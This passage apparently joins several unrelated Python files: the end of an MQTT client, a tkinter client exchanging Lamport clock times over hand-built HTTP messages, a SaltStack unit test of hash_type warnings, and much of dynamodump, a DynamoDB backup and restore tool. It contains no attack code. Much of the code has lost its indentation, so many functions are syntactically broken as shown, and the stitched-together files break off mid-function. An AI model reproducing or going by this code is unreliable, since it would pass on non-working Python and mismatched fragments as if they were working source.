print("[STATUS] Inicializando MQTT...")
client = mqtt.Client('113')
client.on_connect = self.on_connect
client.on_message = self.on_message
client.connect(self.broker, self.port)
client.loop_forever()
if __name__ == "__main__":
my = My_client_ad('broker.emqx.io', 1883, 'ad')
my.start()
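
# --- Illustrative sketch (not part of the original file) ---
# A hedged example of the other side of the protocol described above: a controller
# publishes "on" and later "off" to the `ad` topic, which makes My_client_ad start
# the acquisition thread and then publish the collected data on the `request`
# topic. Broker, port and topics come from the code above; the 10-second
# acquisition window is an arbitrary choice for this example.
def _example_controller():  # hypothetical helper, for illustration only
    from time import sleep
    controller = mqtt.Client('controller-example')
    controller.connect('broker.emqx.io', 1883)
    controller.loop_start()
    controller.publish('ad', 'on')    # start the reading
    sleep(10)                         # let the device acquire data
    controller.publish('ad', 'off')   # stop the reading; the client replies on `request`
    controller.loop_stop()
    controller.disconnect()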
|
client.py
|
from email.utils import formatdate #required for formatting date & time
from datetime import datetime #required to get current datetime for HTTP
from time import mktime,sleep #required for timestamp with zone
import tkinter #required for GUI
from tkinter import messagebox #required for alert box
from socket import AF_INET, socket, SOCK_STREAM #required for socket programming
from threading import Thread #required for multithreading
import random #generate random number
import ast #converts a string containing a dictionary to an actual dictionary
def startTimer():
    # Description
    # The function runs as a separate thread and its job is to increment the timer
    # every second and display the time continuously on the client window
    # Input: NA
    # Output: NA
    global clock,quitClient #clock is a global variable; quitClient is to indicate if
# a client has decided to quit
msg_list.insert(tkinter.END,"Clock set to: "+ str(clock)) #display initial time
msg_list.see(tkinter.END) #set to new line
while quitClient == False: #timer should run until closed, hence infinite loop
sleep(1) #sleep for a second before incrementing the counter
clock = clock + 1 # increment the time counter
try:
logClock.delete(0,tkinter.END) #clears the window
#display the time on the client window continously
logClock.insert(tkinter.END,"Clock: "+ str(clock))
except RuntimeError:
break
def parseHTTPresponse(Httpmsg):
# Description
# The function parses the incoming HTTP response message from server
# and returns the payload;
# Input:
# Httpmsg-> HTTP encoded response message
# Output:
# status-> HTTP response message status
    # query-> parsed payload in dictionary format
crlf = "\r\n" # Carriage return & Line feed for HTTP request message
status = 0 # Status of HTTP response message initialize
query = {} # dictionary to hold the payload of the HTTP response
ss = Httpmsg.split(crlf) # split the message based on the CRLF and store into a list
first_line = ss[0].split(" ") # read the first line of the HTTP response (to get status)
try:
if first_line[1] == '200': # if the status is 200 (OK)
status = 200 # store the status to return
# split the last line of payload based on delimiter && to
# fetch all elements of the payload and store into a list
# Ex: payload may contain: name=john&&message=hello
# so payload will have => [name=john, message=hello]
payload = ss[len(ss) - 1].split("&&")
# split each element of the list payload based on '='
# from the above example, the below dictionary query will have
# query={'name':'john','message':'hello'}
# Please note that if the original message contains =, blank will be sent
for item in payload:
left,right = item.split("=") # split based on '='
query.update({left:right}) # add new pair to dictionary
else:
            status = 400 # update status (400 = Bad request)
    except IndexError: # Check for Index error
        pass # This exception won't occur since the HTTP message is encoded by us
return status,query # return the status and dictionary payload
def encodeHTTP(method,query):
# Description:
# Given a dictionary of values and HTTP method(GET or POST),
# this function encodes the query into HTTP request
# Input:
# method-> HTTP method (POST or GET)
    # query-> dictionary pairs of data to be sent to the server
# Output
# HTTPmsg-> HTTP encoded message
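    # Example (illustrative): encodeHTTP("GET", {"clients": "True"}) yields a request whose
    # first line is "GET /?clients=True HTTP/1.1", followed by the Host, User-Agent,
    # Content-Type, Content-Length and Date headers assembled below.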
space = " " # space to delimit HTTP request
url = "/" # start of the url (for POST its empty)
host1 = "127.0.0.1:5001" # host address (here its localhost)
version = "HTTP/1.1" #HTTP version
crlf = "\r\n" #carriage return and line feed used for line seperator for http request
user_agent = "python-client 1.0" # user agent, usign python client here
content_type = "text/plain" # content type is plain text (no file transfer supported)
now = datetime.now() # get current date and time
stamp = mktime(now.timetuple()) # convert local time to seconds since the Epoch
# formats the above time into HTTP timestamp format
date = (formatdate( timeval = stamp, localtime = False, usegmt = True ))
payload="" #initialize payload
# the following code converts dictionary(query) into string format as follows:
# query={'name':'john','message':'hello'}
# payload will have => name=john&&message=hello
for idx, item in enumerate(query):
if idx < len(query) - 1:
payload = payload+item+"="+query[item]+"&&" #add && as delimiter
else:
payload = payload+item+"="+query[item] #no need of delimiter && for last line
content_len = len(payload) # payload length
if method == 'GET': # if the method is GET,
url = url+'?'+payload # store payload in URL
# concatenate all HTTP headers stored above
HTTPmsg = method + space + url + space + version + crlf
HTTPmsg = HTTPmsg + "Host: " + host1 + crlf
HTTPmsg = HTTPmsg + "User-Agent: " + user_agent + crlf
HTTPmsg = HTTPmsg + "Content-Type: " + content_type + crlf
if method == 'GET':
# Content length is zero for GET request
HTTPmsg = HTTPmsg + "Content-Length: " + "0" + crlf
else:
# payload length is the content length for POST request
HTTPmsg = HTTPmsg + "Content-Length: " + str(content_len) + crlf
HTTPmsg = HTTPmsg + "Date: " + date + crlf + crlf
if method == 'POST': #if payload is POST
HTTPmsg = HTTPmsg + payload # store the payload in HTTP body
return HTTPmsg # return the HTTP encoded message
def send_msg(msg):
# Description:
# Sends the message to the server
# Input:
# msg-> HTTP Request message
# Output: NA
global serverConnected
try:
sock.send(bytes(msg, "utf8")) # send the message to server
except ConnectionResetError:
        # This error occurs on server disconnection
msg_list.insert(tkinter.END,"Server Disconnected")
serverConnected = False
msg_list.see(tkinter.END) #scrolls to the latest message
    except ConnectionAbortedError: #server disconnected
pass
def clientList():
# Description:
    # This is a separate thread which continuously asks for the client list every 8 seconds
    # Sends the request to the server for the client list every 8 seconds to choose
    # from the list of clients; note that selecting a random client
    # and sending the local time to that client is performed in the receive thread
# Input: NA
# Output: NA
global quitClient, serverConnected
    # loop while the client has not quit and the server is still connected
while quitClient == False and serverConnected == True:
        # fetch the client list every 8 seconds; basically it prepares itself to
        # send the local time every 8 seconds by asking the server for the
        # current list of clients
sleep(8)
HTTPmsg = encodeHTTP("GET",{'clients':'True'}) # encode HTTP query for client list
try:
send_msg(HTTPmsg) # send query to server
except RuntimeError:
return
def send(event=None):
# Description:
# This is called when user enters the client name; It has 3 functions:
# 1. registers client name on the server
# 2. starts the clock thread
# 3. starts the thread to get client list to eventually send local time
# Input: NA
# Output: NA
global clock,name,quitClient
if quitClient == True: # check if user has clicked on Quit
if serverConnected == True: # check if server is connected
#if server is still on & user has quit, inform the server about the quit
HTTPmsg = encodeHTTP("POST",{'quit':'True'}) #encode quit message
send_msg(HTTPmsg) # send the message to server
return # nothing more to do, so return
name = my_msg.get() # read user input
my_msg.set("") # Clears input field.
top.title(name) # change the client window title
HTTPmsg = encodeHTTP("POST",{'name':name}) #parse name into HTTP request
send_msg(HTTPmsg) # register the client name onto server
msg_list.insert(tkinter.END,"Your name is stored in server as "+name+". You can send messages now.") #display info to user
msg_list.see(tkinter.END) # scroll to the bottom
send_button.config(state="disabled") #disable send button
entry_field.config(state="disabled") # disable the text input box
# start the thread to clock the time
timer_thread = Thread(target=startTimer)
timer_thread.start()
# start the thread to get client list from server
clientlist_thread = Thread(target=clientList)
clientlist_thread.start()
def receive():
# Description:
    # This function is called as a new thread which continuously listens to the server
    # and receives messages from it until either the server or the client quits.
# Here, the HTTP response from the server can be any of the following:
    # 1. receive remote time from other clients and adjust local time based on
    # the Lamport clock rule
    # 2. Upon getting the list of active clients stored in the server,
# send the local time to a randomly selected client
# 3. receive Server disconnection notification
# Based on the above criteria, suitable actions are taken.
# Input: NA
# Output: NA
global clock, quitClient, serverConnected
    while True: # continuously receive data from the server
try:
msg = sock.recv(buffer).decode("utf8") #receive HTTP response from server
if quitClient == True or serverConnected == False:
break #if server or client is killed, stop the loop
status,payload = parseHTTPresponse(msg) # parse the HTTP response message
try:
sender = payload['source'] # get the remote client name sending its time
remote_time = int(payload['time']) #type cast the time from string to int
msg_list.insert(tkinter.END,sender+"'s Time: "+ str(remote_time)) #display the remote time
msg_list.insert(tkinter.END,"Local time: "+ str(clock)) # display local time
                # Lamport clock logic:
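                # Example (illustrative): if the local clock is 7 and a remote time of 12
                # arrives, the local clock becomes 13 (remote + 1); a remote time of 3
                # would leave the local clock unchanged at 7.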
if remote_time >= clock: #if incoming time is greater than local time,
clock = remote_time + 1 # reset local time by adding 1 to remote time
#display new local time
msg_list.insert(tkinter.END,"Local clock reset to: "+ str(clock))
#update the local clock window
                    logClock.delete(0,tkinter.END) #clears the clock window
logClock.insert(tkinter.END,"Clock: "+ str(clock))
else:
#if incoming time is lesser than local time, no time reset
msg_list.insert(tkinter.END,"No adjustment necessary")
msg_list.see(tkinter.END) #scroll to bottom
except KeyError: #upon getting client list, pick random client and send time
try:
clist = ast.literal_eval(payload['clist']) #converts a string containing a dictionary to an actual dictionary
clist.remove(name) # removes self from the list of clients
n = len(clist) #number of remaining clients
if n:
                        r = random.randint(0, n - 1) # selects a random client index
try:
                            #encode the time and source into HTTP
msg_list.insert(tkinter.END,"Remote client selected: "+clist[r])
msg_list.insert(tkinter.END,"Local time sent: "+str(clock))
HttpMsg = encodeHTTP("POST",{'destination':clist[r],'clock': str(clock)})
send_msg(HttpMsg) #send the encoded message
except IndexError:
continue
except KeyError:
try: # Server disconnection notification
if payload['serv_quit'] == 'True':
serverConnected = False
msg_list.insert(tkinter.END,"Server disconnected; Communication not possible!")
msg_list.see(tkinter.END) #scroll to latest line
except KeyError:
pass
except ConnectionResetError:
break
def win_close(event=None):
# Description:
# Event handler called on the closing of window
# Input: NA
# Output: NA
global quitClient
quitClient = True #set quit to True
    send() # call the send() method to notify the server about the disconnection
top.quit() # stop the main loop of tkinter GUI
if __name__ == "__main__":
# Description:
# Execution starts from here; All globals are declared here;
# The Tkinter GUI is initialized here
# The concurrent thread for listening to server is also started here
# Input:
# Output:
    clock = random.randint(0,51) #initialize the clock to a random number between 0 and 51
quitClient = False #quitClient initialized to false
name = "" #local client name
    serverConnected = True #serverConnected initialized to true
top = tkinter.Tk() # create a root window handler
top.title("Client") # set the window titlw as client; updated once the user enters name
messages_frame = tkinter.Frame(top) #message frame to display text on the window
my_msg = tkinter.StringVar() # to set and get text from tkinter.Entry (input box)
my_msg.set("") # set it to blank at first
scrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.
# creates listbox to display the text entered by the user
msg_list = tkinter.Listbox(messages_frame, height=15, width=70, yscrollcommand=scrollbar.set)
    scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y) #set the scroll bar for first view
# configure list box geometry
msg_list.pack(side=tkinter.LEFT,expand=tkinter.YES, fill=tkinter.BOTH)
msg_list.pack()
logClock = tkinter.Listbox(messages_frame, height=15, width=25)
logClock.pack(side=tkinter.BOTTOM,expand=tkinter.YES, fill=tkinter.BOTH)
logClock.pack()
# configures the frame geometry allowing it to expand
messages_frame.pack(expand=tkinter.YES,fill=tkinter.BOTH)
#Label for input box
button_label = tkinter.Label(top, text="Enter name:")
button_label.pack()
# Input box for user input: we can set the input and read value off it using
# variable 'my_msg'; also the input font color is set to red
entry_field = tkinter.Entry(top, textvariable=my_msg, foreground="Red")
# calls the send() method on pressing enter
entry_field.bind("<Return>", send)
entry_field.pack()
# button to send the message; calls send() method
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
# button to quit; calls win
quit_button = tkinter.Button(top, text="Quit", command=win_close)
quit_button.pack()
# on closing the window; call the win_close() function
top.protocol("WM_DELETE_WINDOW", win_close)
# prompt to the user to register the client name on the server
msg_list.insert(tkinter.END, "Enter your name:")
    msg_list.see(tkinter.END) #scroll to the latest message
host = "127.0.0.1" # server IP address; here its localhost
port = 5002 # port number of the server (hardcoded)
buffer = 1024 # buffer size
addr = (host, port) # IP address-port tuple
sock = socket(AF_INET, SOCK_STREAM) # creates a socket for TCP connection
try:
sock.connect(addr) # connects to the localhost server with its port
        # starts a new thread to listen to the server for messages continuously
receive_thread = Thread(target=receive)
receive_thread.start()
# start the GUI main loop
tkinter.mainloop()
except ConnectionRefusedError: # if server connection failed
top.destroy() # destroy the UI
# display message that no server is active
serv_msg = "Server not listening. Please run 'server.py' first and try again"
tkinter.messagebox.showinfo("Message",serv_msg) #alert box
print(serv_msg)
|
daemons_test.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Bo Maryniuk <bo@suse.de>`
'''
# Import python libs
from __future__ import absolute_import
# Import Salt Testing libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import patch, MagicMock, NO_MOCK, NO_MOCK_REASON
ensure_in_syspath('../')
# Import Salt libs
import integration
import multiprocessing
from salt.cli import daemons
class LoggerMock(object):
'''
Logger data collector
'''
def __init__(self):
'''
init
:return:
'''
self.reset()
def reset(self):
'''
Reset values
:return:
'''
self.messages = list()
def info(self, data):
'''
Collects the data from the logger of info type.
:param data:
:return:
'''
self.messages.append({'message': data, 'type': 'info'})
def warning(self, data):
'''
Collects the data from the logger of warning type.
:param data:
:return:
'''
self.messages.append({'message': data, 'type': 'warning'})
def has_message(self, msg, log_type=None):
'''
        Check if the log has a message.
        :param msg:
        :param log_type:
        :return:
'''
for data in self.messages:
if (data['type'] == log_type or not log_type) and data['message'].find(msg) > -1:
return True
return False
@skipIf(NO_MOCK, NO_MOCK_REASON)
class DaemonsStarterTestCase(TestCase, integration.SaltClientTestCaseMixIn):
'''
Unit test for the daemons starter classes.
'''
def _multiproc_exec_test(self, exec_test):
m_parent, m_child = multiprocessing.Pipe()
p_ = multiprocessing.Process(target=exec_test, args=(m_child,))
p_.start()
self.assertTrue(m_parent.recv())
p_.join()
def test_master_daemon_hash_type_verified(self):
'''
Verify if Master is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_master():
'''
Create master instance
:return:
'''
obj = daemons.Master()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['start_log_info', 'prepare', 'shutdown', 'master']:
setattr(obj, attr, MagicMock())
return obj
_logger = LoggerMock()
ret = True
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_master().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_master().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_minion_daemon_hash_type_verified(self):
'''
Verify if Minion is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_minion():
'''
Create minion instance
:return:
'''
obj = daemons.Minion()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['start_log_info', 'prepare', 'shutdown']:
setattr(obj, attr, MagicMock())
setattr(obj, 'minion', MagicMock(restart=False))
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_minion().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_minion().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_proxy_minion_daemon_hash_type_verified(self):
'''
Verify if ProxyMinion is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_proxy_minion():
'''
Create proxy minion instance
:return:
'''
obj = daemons.ProxyMinion()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['minion', 'start_log_info', 'prepare', 'shutdown', 'tune_in']:
setattr(obj, attr, MagicMock())
obj.minion.restart = False
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_proxy_minion().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_proxy_minion().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
def test_syndic_daemon_hash_type_verified(self):
'''
Verify if Syndic is verifying hash_type config option.
:return:
'''
def exec_test(child_pipe):
def _create_syndic():
'''
Create syndic instance
:return:
'''
obj = daemons.Syndic()
obj.config = {'user': 'dummy', 'hash_type': alg}
for attr in ['syndic', 'start_log_info', 'prepare', 'shutdown']:
setattr(obj, attr, MagicMock())
return obj
ret = True
_logger = LoggerMock()
with patch('salt.cli.daemons.check_user', MagicMock(return_value=True)):
with patch('salt.cli.daemons.log', _logger):
for alg in ['md5', 'sha1']:
_create_syndic().start()
ret = ret and _logger.messages \
and _logger.has_message('Do not use {alg}'.format(alg=alg),
log_type='warning')
_logger.reset()
for alg in ['sha224', 'sha256', 'sha384', 'sha512']:
_create_syndic().start()
ret = ret and _logger.messages \
and not _logger.has_message('Do not use ')
child_pipe.send(ret)
child_pipe.close()
self._multiproc_exec_test(exec_test)
if __name__ == '__main__':
from integration import run_tests
run_tests(DaemonsStarterTestCase, needs_daemon=False)
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
BILLING_MODE = "PROVISIONED"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", Now trying user provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", Now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
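                # Example (illustrative): with no separator, a wildcard such as "Staging*"
                # matches dump directories like "StagingUsers", because the wildcard prefix
                # is reduced to its leading CamelCase word before the startswith comparison.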
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
                logging.warning("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
                        + conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
    Wait for table to be in the desired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
        except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput"
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name, billing_mode):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
